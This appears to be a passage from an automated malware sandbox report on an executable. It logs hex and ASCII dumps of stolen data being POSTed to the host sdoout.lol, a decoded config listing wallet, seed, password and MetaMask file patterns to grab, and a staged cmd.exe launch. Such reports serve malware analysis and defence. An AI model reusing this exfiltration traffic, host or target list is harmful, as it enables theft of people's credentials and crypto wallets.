                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:42 UTC912INData Raw: 33 38 34 0d 0a 5a 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 4c 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6d 4a 70 64 47 4e 76 61 57 34 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 63 32 56 6c 5a 43 6f 75 4b 69 77 71 59 33 4a 35 63 48 52 76 4b 69 34 71 4c 43 70 68 5a 47 31 70 62 69 6f 75 4b 69 77 71 64 6d 46 73 61 57 51 71 4c 69 6f 73 4b 6e 42 68 63 33 4e 33 62 33 4a 6b 4b 69 34 71 4c 43 70 74 62 32 35 6c 65 53 6f 75 4b 69 77 71 63 6d 52 77 4b 69 34 71 4c 43 70 7a 5a 58 4a 32 5a 58 49 71 4c 69 6f 73 4b 6d 5a 76 63 6e 56 74 4b 69 34 71 4c 43 70 7a 61 47 39 77 4b 69 34 71 4c 43 70 74 5a 58 52 68 62 57 46 7a 61 79 6f 75 4b 69 77 71 62 57 35 6c 62 57 39 75 61 57 73 71 4c 69 6f 73 4b 6e 4e 30 5a 57
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 384ZGVza3RvcHwlREVTS1RPUCVcfCoudHh0LCp3YWxsZXQqLiosKmJpdGNvaW4qLiosKmJ0YyouKiwqc2VlZCouKiwqY3J5cHRvKi4qLCphZG1pbiouKiwqdmFsaWQqLiosKnBhc3N3b3JkKi4qLCptb25leSouKiwqcmRwKi4qLCpzZXJ2ZXIqLiosKmZvcnVtKi4qLCpzaG9wKi4qLCptZXRhbWFzayouKiwqbW5lbW9uaWsqLiosKnN0ZW


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    45192.168.2.550132116.203.14.44432656C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:47 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----w4w4wl68y5ph47qi589r
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                                                                    Host: sdoout.lol
                                                                                                                                                                                                                                                                                                                                    Content-Length: 98201
                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:47 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 77 34 77 34 77 6c 36 38 79 35 70 68 34 37 71 69 35 38 39 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 64 31 30 33 30 31 34 64 65 62 36 33 33 32 35 65 30 32 34 31 31 61 33 62 65 35 62 35 30 33 33 0d 0a 2d 2d 2d 2d 2d 2d 77 34 77 34 77 6c 36 38 79 35 70 68 34 37 71 69 35 38 39 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 66 32 35 61 63 33 65 32 66 62 34 33 66 34 65 33 37 36 30 37 65 36 63 39 62 63 65 39 36 62 0d 0a 2d 2d 2d 2d 2d 2d 77 34 77 34 77 6c 36 38 79 35 70 68 34 37 71 69 35 38 39 72 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                                    Data Ascii: ------w4w4wl68y5ph47qi589rContent-Disposition: form-data; name="token"8d103014deb63325e02411a3be5b5033------w4w4wl68y5ph47qi589rContent-Disposition: form-data; name="build_id"8ef25ac3e2fb43f4e37607e6c9bce96b------w4w4wl68y5ph47qi589rCont
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:47 UTC16355OUTData Raw: 55 55 55 55 41 46 46 46 46 41 42 53 55 74 46 41 43 55 55 55 55 41 46 4a 53 30 55 41 4a 52 52 52 51 41 55 6c 4c 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 42 6f 6f 4e 41 43 55 55 55 55 41 46 46 46 46 41 43 55 55 74 4a 51 41 6c 46 4c 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 53 47 6c 70 44 51 41 55 55 55 55 41 46 4a 53 30 6c 41 42 51 61 4b 4b 41 45 6f 70 61 53 67 41 6f 6f 6f 6f 41 4b 53 6c 6f 6f 41 53 69 69 69 67 42 4b 4b 57 6b 6f 41 4b 4b 4b 4b 41 45 6f 6f 6f 6f 41 4b 53 6c 70 4b 41 43 6b 70 61 53 67 41 6f 6f 6f 6f 41 31 36 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 53 76 4d 66 69 55 76 38 41 59 2f 69 7a 77 78 34 6d 58 68 49 70 78 62 7a 74 2f 73 35 7a 2f
                                                                                                                                                                                                                                                                                                                                    Data Ascii: UUUUAFFFFABSUtFACUUUUAFJS0UAJRRRQAUlLRQAlFFFABRRRQAUUUUAFBooNACUUUUAFFFFACUUtJQAlFLRQAlFFFABRRRQAlFFFABRRRQAlFFFABRRRQAlFFFABSGlpDQAUUUUAFJS0lABQaKKAEopaSgAooooAKSlooASiiigBKKWkoAKKKKAEooooAKSlpKACkpaSgAooooA16KKKACiiigAooooASvMfiUv8AY/izwx4mXhIpxbzt/s5z/
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:47 UTC16355OUTData Raw: 58 74 35 66 52 74 48 6d 5a 34 57 4f 6c 7a 56 62 64 69 56 66 61 70 56 2b 74 51 67 31 49 44 58 71 4a 48 46 59 6e 55 38 31 4b 6f 79 61 69 58 72 55 79 34 37 35 6f 73 5a 76 79 46 78 6e 33 71 49 75 38 54 5a 51 6b 56 30 57 6c 65 48 70 62 77 43 57 34 4a 53 49 39 42 33 4e 64 52 44 34 61 30 6c 49 67 72 57 6f 6b 39 53 35 35 72 68 72 59 36 6c 42 38 75 35 32 55 73 42 55 71 4b 37 30 4f 4a 73 72 78 5a 78 74 59 34 63 56 63 48 31 72 62 31 48 77 66 61 4d 50 4f 73 43 59 5a 6c 35 41 37 47 73 44 4d 6b 55 6a 52 54 4c 74 6b 55 34 59 56 35 39 53 74 43 57 73 54 48 45 59 57 56 46 33 65 78 4d 4b 73 78 4e 7a 56 51 4e 79 4b 6d 6a 50 4e 65 64 56 6c 71 63 36 4e 69 32 63 35 46 62 31 72 4a 6c 4b 35 6d 32 62 70 57 37 5a 53 56 77 54 33 4c 6a 6f 58 37 75 50 7a 37 4f 52 44 32 55 6b 66 57 75
                                                                                                                                                                                                                                                                                                                                    Data Ascii: Xt5fRtHmZ4WOlzVbdiVfapV+tQg1IDXqJHFYnU81KoyaiXrUy475osZvyFxn3qIu8TZQkV0WleHpbwCW4JSI9B3NdRD4a0lIgrWok9S55rhrY6lB8u52UsBUqK70OJsrxZxtY4cVcH1rb1HwfaMPOsCYZl5A7GsDMkUjRTLtkU4YV59StCWsTHEYWVF3exMKsxNzVQNyKmjPNedVlqc6Ni2c5Fb1rJlK5m2bpW7ZSVwT3LjoX7uPz7ORD2UkfWu
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:47 UTC16355OUTData Raw: 4c 77 73 59 6a 79 55 75 4a 6c 7a 39 4a 47 72 71 5a 66 38 41 56 50 37 71 66 35 56 7a 50 77 2f 50 2f 45 69 6e 2f 77 43 76 79 66 38 41 39 47 4e 51 42 31 66 57 69 6c 48 53 69 67 42 4b 4b 4b 4b 41 43 6b 6f 70 61 41 45 78 53 55 74 4c 51 41 32 6b 7a 54 73 55 6d 4b 41 4f 48 31 35 64 33 6a 37 54 51 41 54 2b 37 42 50 48 75 61 36 31 77 32 7a 39 32 71 37 6a 30 7a 58 4f 61 68 6b 66 45 4b 7a 32 70 76 50 32 5a 75 50 7a 72 6f 50 4e 75 63 38 32 35 78 37 4d 4b 74 45 4d 57 52 6c 69 69 33 4f 42 6e 67 48 61 4b 52 49 59 34 77 46 7a 79 54 6e 6b 30 65 5a 50 2f 77 41 2b 72 66 38 41 66 61 31 45 42 4f 58 4c 79 51 4d 78 42 79 76 7a 44 69 71 4a 4c 47 7a 50 51 44 30 36 30 30 49 33 6e 4e 6b 4c 73 2f 68 48 70 51 5a 4a 2b 76 32 5a 76 2b 2b 68 52 35 73 2f 48 2b 6a 4e 7a 2f 74 69 67 43 4e
                                                                                                                                                                                                                                                                                                                                    Data Ascii: LwsYjyUuJlz9JGrqZf8AVP7qf5VzPw/P/Ein/wCvyf8A9GNQB1fWilHSigBKKKKACkopaAExSUtLQA2kzTsUmKAOH15d3j7TQAT+7BPHua61w2z92q7j0zXOahkfEKz2pvP2ZuPzroPNuc825x7MKtEMWRlii3OBngHaKRIY4wFzyTnk0eZP/wA+rf8Afa1EBOXLyQMxByvzDiqJLGzPQD0600I3nNkLs/hHpQZJ+v2Zv++hR5s/H+jNz/tigCN
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:47 UTC16355OUTData Raw: 70 78 64 6d 6d 4e 53 6c 73 39 6a 48 62 56 72 39 4a 4d 4e 5a 6c 6c 55 34 4f 31 54 79 66 38 4d 59 71 5a 74 59 6d 55 74 2f 6f 45 70 41 58 63 4d 44 72 57 76 67 65 67 78 52 67 65 67 34 36 56 73 68 47 44 4c 72 56 32 34 68 4d 46 6c 49 43 78 47 34 4d 4f 67 72 63 58 4a 55 45 39 78 54 73 44 47 4f 50 79 6f 41 34 70 67 4a 53 5a 70 39 4a 69 67 44 6b 37 67 2f 38 58 4c 73 76 2b 76 52 76 36 31 31 31 63 66 65 6e 62 38 53 62 48 2f 72 30 62 2b 74 64 50 35 68 39 61 41 4c 4f 52 54 66 78 71 44 7a 50 65 6b 33 6d 67 43 63 39 61 53 6f 64 35 6f 38 77 30 41 53 45 6d 6d 6d 6f 7a 49 61 54 64 51 41 2b 6b 4a 46 4d 4a 4e 4d 4c 55 41 50 4c 55 77 6d 6d 46 36 4e 31 41 44 73 30 30 6d 6d 6c 71 61 57 6f 41 63 54 54 53 61 61 54 52 6e 69 67 42 63 30 32 6b 7a 53 5a 6f 41 55 6d 6d 35 70 43 61 54
                                                                                                                                                                                                                                                                                                                                    Data Ascii: pxdmmNSls9jHbVr9JMNZllU4O1Tyf8MYqZtYmUt/oEpAXcMDrWvgegxRgeg46VshGDLrV24hMFlICxG4MOgrcXJUE9xTsDGOPyoA4pgJSZp9JigDk7g/8XLsv+vRv6111cfenb8SbH/r0b+tdP5h9aALORTfxqDzPek3mgCc9aSod5o8w0ASEmmmozIaTdQA+kJFMJNMLUAPLUwmmF6N1ADs00mmlqaWoAcTTSaaTRnigBc02kzSZoAUmm5pCaT
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:47 UTC16355OUTData Raw: 49 72 68 6c 74 35 70 2f 47 46 6e 64 4a 70 51 67 6b 2b 33 53 72 63 46 64 4e 6c 44 6d 50 5a 49 75 58 75 53 64 72 71 33 79 6b 4b 42 67 5a 55 5a 34 35 62 46 59 57 2b 6e 36 4a 4c 59 4c 6f 4b 4b 57 31 47 58 37 51 58 30 75 53 61 4e 55 33 79 4e 47 78 6a 51 44 7a 6c 78 74 41 77 53 46 79 44 78 6a 46 48 53 34 33 76 62 2b 75 76 2b 52 36 46 52 58 50 2b 43 34 5a 37 66 77 36 73 4d 38 54 52 62 4c 69 66 79 30 61 46 6f 51 45 38 78 69 75 45 59 6b 71 75 4d 59 47 54 67 59 72 6f 4b 47 49 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 66 52 53 55 55 41 46 46 46 46 41 42 53 64 71 57 6b 6f 41 57 6b 6f 6f 6f 41 4b 4b 53 69 67 42 61 53 69 69 67 41 6f 6f 6f 6f 41 4b 4b 53 69 67 42 61 4b
                                                                                                                                                                                                                                                                                                                                    Data Ascii: Irhlt5p/GFndJpQgk+3SrcFdNlDmPZIuXuSdrq3ykKBgZUZ45bFYW+n6JLYLoKKW1GX7QX0uSaNU3yNGxjQDzlxtAwSFyDxjFHS43vb+uv+R6FRXP+C4Z7fw6sM8TRbLify0aFoQE8xiuEYkquMYGTgYroKGIKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAfRSUUAFFFFABSdqWkoAWkoooAKKSigBaSiigAooooAKKSigBaK
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:47 UTC71OUTData Raw: 74 72 2f 41 4e 66 45 33 2f 6f 4d 64 55 36 75 53 66 38 41 49 46 74 66 2b 76 69 62 2f 77 42 42 6a 6f 41 2f 2f 39 6b 3d 0d 0a 2d 2d 2d 2d 2d 2d 77 34 77 34 77 6c 36 38 79 35 70 68 34 37 71 69 35 38 39 72 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                                                    Data Ascii: tr/ANfE3/oMdU6uSf8AIFtf+vib/wBBjoA//9k=------w4w4wl68y5ph47qi589r--
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:48 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:48 GMT
                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:48 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    46192.168.2.550133116.203.14.44432656C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:49 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----90zct2v3e3op8qqq16f3
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                                                                    Host: sdoout.lol
                                                                                                                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:49 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 39 30 7a 63 74 32 76 33 65 33 6f 70 38 71 71 71 31 36 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 64 31 30 33 30 31 34 64 65 62 36 33 33 32 35 65 30 32 34 31 31 61 33 62 65 35 62 35 30 33 33 0d 0a 2d 2d 2d 2d 2d 2d 39 30 7a 63 74 32 76 33 65 33 6f 70 38 71 71 71 31 36 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 66 32 35 61 63 33 65 32 66 62 34 33 66 34 65 33 37 36 30 37 65 36 63 39 62 63 65 39 36 62 0d 0a 2d 2d 2d 2d 2d 2d 39 30 7a 63 74 32 76 33 65 33 6f 70 38 71 71 71 31 36 66 33 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                                    Data Ascii: ------90zct2v3e3op8qqq16f3Content-Disposition: form-data; name="token"8d103014deb63325e02411a3be5b5033------90zct2v3e3op8qqq16f3Content-Disposition: form-data; name="build_id"8ef25ac3e2fb43f4e37607e6c9bce96b------90zct2v3e3op8qqq16f3Cont
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:49 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:49 GMT
                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    47192.168.2.550134116.203.14.44432656C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:50 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----8ymym7yuk6fuaiwtjeuk
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                                                                    Host: sdoout.lol
                                                                                                                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:50 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 38 79 6d 79 6d 37 79 75 6b 36 66 75 61 69 77 74 6a 65 75 6b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 64 31 30 33 30 31 34 64 65 62 36 33 33 32 35 65 30 32 34 31 31 61 33 62 65 35 62 35 30 33 33 0d 0a 2d 2d 2d 2d 2d 2d 38 79 6d 79 6d 37 79 75 6b 36 66 75 61 69 77 74 6a 65 75 6b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 66 32 35 61 63 33 65 32 66 62 34 33 66 34 65 33 37 36 30 37 65 36 63 39 62 63 65 39 36 62 0d 0a 2d 2d 2d 2d 2d 2d 38 79 6d 79 6d 37 79 75 6b 36 66 75 61 69 77 74 6a 65 75 6b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                                    Data Ascii: ------8ymym7yuk6fuaiwtjeukContent-Disposition: form-data; name="token"8d103014deb63325e02411a3be5b5033------8ymym7yuk6fuaiwtjeukContent-Disposition: form-data; name="build_id"8ef25ac3e2fb43f4e37607e6c9bce96b------8ymym7yuk6fuaiwtjeukCont
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:51 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:51 GMT
                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                    48192.168.2.55013540.115.3.253443
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:47:15 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 56 39 55 4d 48 6e 62 63 69 45 47 44 30 71 47 74 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 30 37 66 34 65 34 65 37 34 33 65 66 34 32 36 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                    Data Ascii: CNT 1 CON 305MS-CV: V9UMHnbciEGD0qGt.1Context: a07f4e4e743ef426
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:47:15 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                                                    Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:47:15 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 56 39 55 4d 48 6e 62 63 69 45 47 44 30 71 47 74 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 30 37 66 34 65 34 65 37 34 33 65 66 34 32 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 36 79 43 6d 44 58 38 52 4d 4f 78 76 50 2b 35 4e 4f 72 49 4b 71 36 46 77 65 38 6a 6a 63 6d 42 78 67 58 43 4e 7a 45 37 4b 74 66 69 48 59 65 70 4d 67 33 65 2f 52 45 33 66 65 58 6a 50 31 57 31 67 4c 65 2f 57 51 35 6b 4a 37 36 50 52 75 51 77 45 4e 4c 71 31 74 72 54 76 58 32 2f 58 41 63 4d 41 2f 76 6f 35 4c 34 68 6a 43 6d 54 44
                                                                                                                                                                                                                                                                                                                                    Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: V9UMHnbciEGD0qGt.2Context: a07f4e4e743ef426<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAY6yCmDX8RMOxvP+5NOrIKq6Fwe8jjcmBxgXCNzE7KtfiHYepMg3e/RE3feXjP1W1gLe/WQ5kJ76PRuQwENLq1trTvX2/XAcMA/vo5L4hjCmTD
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:47:15 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 56 39 55 4d 48 6e 62 63 69 45 47 44 30 71 47 74 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 30 37 66 34 65 34 65 37 34 33 65 66 34 32 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                                                    Data Ascii: BND 3 CON\WNS 0 197MS-CV: V9UMHnbciEGD0qGt.3Context: a07f4e4e743ef426<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:47:15 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:47:15 UTC58INData Raw: 4d 53 2d 43 56 3a 20 78 67 39 79 35 38 6d 58 50 30 65 38 55 68 7a 56 64 65 34 77 65 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                                                    Data Ascii: MS-CV: xg9y58mXP0e8UhzVde4weQ.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                                                                                                                    Start time:03:45:10
                                                                                                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\6684V5n83w.exe
                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\6684V5n83w.exe"
                                                                                                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                    File size:1'160'471 bytes
                                                                                                                                                                                                                                                                                                                                    MD5 hash:53C60D599AA498ED4EFA79BA0B12E29F
                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                                                                                                                                                    Start time:03:45:12
                                                                                                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c move Focused Focused.cmd & Focused.cmd
                                                                                                                                                                                                                                                                                                                                    Imagebase:0x790000
                                                                                                                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                                                                                                                                    Start time:03:45:12
                                                                                                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
